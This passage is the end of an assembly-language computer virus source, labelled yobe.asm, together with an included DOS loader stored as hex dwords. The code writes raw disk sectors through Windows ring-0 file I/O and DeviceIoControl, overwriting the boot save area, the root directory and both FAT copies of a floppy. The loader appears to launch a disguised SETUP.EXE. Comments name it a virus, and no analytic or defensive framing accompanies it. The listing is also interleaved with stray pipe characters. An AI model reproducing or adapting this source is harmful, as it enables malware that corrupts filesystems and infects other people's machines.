|
|
call Int26h
|
|
|
|
xor ecx, ecx
|
|
inc ecx
|
|
lea esi, [ebx + save - ti_gdelta]
|
|
mov edx, 2880-1
|
|
call Int26h ;write SAVE area
|
|
|
|
call ROOTinit
|
|
call Int26h ;write ROOT
|
|
|
|
push 9
|
|
pop ecx
|
|
lea esi, [ebx + FAT - ti_gdelta]
|
|
xor edx, edx
|
|
inc edx
|
|
pushad
|
|
call Int26h ;write first FAT
|
|
popad
|
|
sub dl, -9
|
|
call Int26h ;write second FAT
|
|
|
|
exit_thread:
|
|
popad ;restore all registers
|
|
ret ;and exit
|
|
|
|
|
|
ROOTinit: ;procedure to initialize
|
|
push 14 ;registers for reading/writing
|
|
pop ecx ;ROOT
|
|
push 19
|
|
pop edx
|
|
lea esi, [ebx + ROOT - ti_gdelta]
|
|
mov ebp, esi
|
|
ret
|
|
|
|
Int26h: mov eax, 0DE00h ;write sectors
|
|
jmp irfio
|
|
Int25h: mov eax, 0DD00h ;read sectors
|
|
irfio: VxDCall IFSMgr_Ring0_FileIO
|
|
ret
|
|
|
|
WriteROOT: ;code used to write sectorz
|
|
mov [regEBX], offset ROOT ;pointer to ROOT field
|
|
mov [regEDX], 19 ;sector number of ROOT
|
|
mov [regECX], 14 ;sectors to write
|
|
I26h: mov [p2526], 3 ;set WRITE mode
|
|
jmp i2526 ;continue
|
|
I25h: mov [p2526], 2 ;set READ mode
|
|
i2526: and [regEAX], 0 ;zero EAX
|
|
I25hSimple:
|
|
push 0
|
|
push offset tmp
|
|
push 28
|
|
push offset regCont
|
|
push 28
|
|
push offset regCont
|
|
push 2
|
|
p2526 = byte ptr $-1
|
|
push dword ptr [d_handle]
|
|
call DeviceIoControl ;backdoor used to call DOS services
|
|
xchg eax, ecx ;error?
|
|
jecxz q2526h ;yeah, set CF and quit
|
|
clc ;clear CF
|
|
ret ;quit
|
|
q2526h: stc ;set CF
|
|
ret ;and quit
|
|
|
|
|
|
loader: ;DOS loader
|
|
include loader.inc
|
|
ldrsize = $-loader ;size of DOS loader
|
|
membase dd 'YYYY' ;address, where is virus placed in memory
|
|
filename db 100h dup ('Y') ;filename
|
|
save db 512 dup ('Y') ;save area
|
|
BOOT db 512 dup ('Y') ;BOOT
|
|
FAT db 4608 dup ('Y') ;FAT
|
|
ROOT db 7168 dup ('Y') ;ROOT
|
|
virus_end: ;virus ends here
|
|
ends ;end of code section
|
|
End Start ;thats all f0lx ;)
|
|
?????????????????????????????????????????????????????????????????[yobe.asm]???
|
|
???????????????????????????????????????????????????????????????[LOADER.INC]???
|
|
dd 5A4Dh
|
|
dd 1
|
|
dd 5410010h
|
|
dd 0FFFFh
|
|
dd 0
|
|
dd 0
|
|
dd 1Ch
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 0
|
|
dd 8EC0331Eh
|
|
dd 901EC4D8h
|
|
dd 1E892E00h
|
|
dd 8C2E008Dh
|
|
dd 0C7008F06h
|
|
dd 9B009006h
|
|
dd 920E8C00h
|
|
dd 1F0E0E00h
|
|
dd 2AB907h
|
|
dd 0BB0B10BAh
|
|
dd 25CD00CBh
|
|
dd 0B8587258h
|
|
dd 0DB33716Ch
|
|
dd 0BAC93343h
|
|
dd 9EBE0012h
|
|
dd 7221CD00h
|
|
dd 40B49346h
|
|
dd 0B900CBBAh
|
|
dd 21CD6000h
|
|
dd 3EB43972h
|
|
dd 2E0721CDh
|
|
dd 0BF068Ch
|
|
dd 48BB4AB4h
|
|
dd 1E21CD05h
|
|
dd 77168C06h
|
|
dd 7C268900h
|
|
dd 0B8070E00h
|
|
dd 0BBBB4B00h
|
|
dd 0ACBA00h
|
|
dd 34B821CDh
|
|
dd 0BCD08E12h
|
|
dd 1F071234h
|
|
dd 0ACBA41B4h
|
|
dd 3321CD00h
|
|
dd 66D88EC0h
|
|
dd 34567868h
|
|
dd 68F6612h
|
|
dd 0B80090h
|
|
dd 0B021CD4Ch
|
|
dd 3A43CF03h
|
|
dd 5445535Ch
|
|
dd 2E205055h
|
|
dd 455845h
|
|
dd 535C3A43h
|
|
dd 50555445h
|
|
dd 452E317Eh
|
|
dd 4558h
|
|
dd 8100h
|
|
dd 0FFFFFF00h
|
|
dd 0FFFFFFFFh
|
|
dw 0EFFh
|
|
db 0
|
|
???????????????????????????????????????????????????????????????[LOADER.INC]???
|
|
|
|
|
|
|
|
|
|
|